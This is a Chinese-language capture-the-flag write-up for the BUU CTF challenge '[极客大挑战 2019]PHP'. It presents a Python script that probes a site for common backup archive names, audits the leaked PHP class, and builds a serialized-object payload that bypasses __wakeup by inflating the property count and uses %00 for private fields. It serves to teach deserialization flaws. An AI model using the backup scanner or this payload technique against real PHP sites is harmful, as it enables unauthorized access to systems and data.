BUU CTF---[极客大挑战 2019]PHP 1

文章目录

  • 知识点
  • 一、备份网站
  • 二、代码审计
    • 1._wakeup()魔术方法
    • 2.GET方法
    • 3.类代码
    • 4.构造对象
  • 参考资料


知识点

1、PHP反序列化
2、绕过魔术方法 __wakeup()

一、备份网站

查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200

import requests

url = "url地址"

l1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
l2 = ['tar', 'tar.gz', 'zip', 'rar']
for i in l1:
    for j in l2:
        print(i+" "+j)
        url_final = url + "/" + i + "." + j
        r = requests.get(url_final)
        print(r)

下载后获得一个备份文件。
BUU CTF---[极客大挑战 2019]PHP 1_第1张图片

二、代码审计

1._wakeup()魔术方法

在反序列化之前调用该方法,一般这个时候变量会被强制改变,所以必须要绕过这个方法对变量的操作。
漏洞原理: 当反序列化字符串中,表示属性个数的值大于其真实值,则跳过。
class.php:

  function __wakeup(){
     
        $this->username = 'guest';
    }

2.GET方法

审计index.php文件获得变量传输方法(初学初学)。首先include 'class.php’则会先把class.php文件加载入程序中,相当于直接复制进本代码。则后续GET到变量后会通过类创建一个对象。


3.类代码

class Name{
//初始化变量的值
    private $username = 'nonono';
    private $password = 'yesyes';
//构造函数,在每一次new一个新对象前会调用这个方法,一个类里面智能有一个构造方法。在这里面表示new对象时把传入的参数赋值
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
    //在序列化结束后就进行的操作
    function __wakeup(){
        $this->username = 'guest';
    }
//析构函数,在对象被销毁之前进行的一些操作。在本题中用于判断是否能够返回flag
    function __destruct(){
        if ($this->password != 100) {
            echo "
NO!!!hacker!!!
"; echo "You name is: "; echo $this->username;echo "
"; echo "You password is: "; echo $this->password;echo "
"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "
hello my friend~~
sorry i can't give you the flag!"; die(); } } }

分析:这个对象必须要满足username=admin,password=100并且要能跳过_wakeup()才能输出flag。

4.构造对象

(1)O:6:“select”//传入对象的名字是select
(2):2 //传入的对象有两个,在如果要饶过,则需要让这个地方比真实对象多,所以改为3
(3){s:14:“username”;s:5:“admin”;s:14:“password”;i:100;}//本体
但是构造成:O:4:“Name”:3:{s:14:“username”;s:5:“admin”;s:14:“password”;i:100;}并不能获得正确的flag。这个时候助力类里面的对象的属性:
private变量会被序列化为:\x00类名\x00变量名
O:4:“Name”:2:{s:14:"\0Name\0username";s:5:“admin”;s:14:"\0Name\0password";i:100;}
构造输入:O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
protected变量会被序列化为:\x00*\x00变量名
O:4:“Name”:2:{s:11:"\0*\0username";s:5:“admin”;s:11:"\0*\0password";i:100;}
构造输入:O:4:“Name”:2:{s:11:"%00*%00username";s:5:“admin”;s:11:"%00*%00password";i:100;}
public变量会被序列化为:变量名
**

这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0
组合。知识用来表示而已,所以在真正构造的时候,使用url编码将这不可见字符构造成%00.

**
最后本题的构造为:select=O:4:“Name”:3:{s:14:"%00Name%00username";s:5:“admin”;s:14:"%00Name%00password";i:100;}
BUU CTF---[极客大挑战 2019]PHP 1_第2张图片

参考资料

1、include和require的区别
2、PHP中__destruct(),类的析构函数详解
3、php 魔术方法
4、[极客大挑战 2019]PHP

你可能感兴趣的:(CTF,php)